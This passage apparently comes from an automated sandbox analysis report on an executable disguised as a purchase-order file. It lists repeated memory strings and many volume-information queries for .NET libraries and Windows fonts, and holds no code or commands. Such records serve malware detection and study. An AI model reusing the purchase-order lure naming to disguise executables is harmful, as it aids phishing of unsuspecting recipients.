                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDk
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDx
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$X
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$W
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDw
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDr
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$:
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$I
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q I
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$G
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDg
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDf
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$D
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh2
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh0
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$y
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh;
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$v
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh9
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh8
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$`
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh$
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$_
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh"
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$^
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD}
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD{
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$Z
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh+
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh)
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh'
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh&
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@-
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@'
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@3
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`Q
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`P
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@0
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`O
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@/
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`N
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`9
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`D
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@#
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`C
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`B
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@!
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`?
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`>
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@L
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`k
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q +
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q *
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`i
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q (
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`h
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@H
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@G
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`u
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@U
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q 4
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@S
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q 1
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@Q
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`n
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`]
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@=
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`d
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`b
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q``
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@k
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@i
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q F
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q =
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q <
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@Z
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@X
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
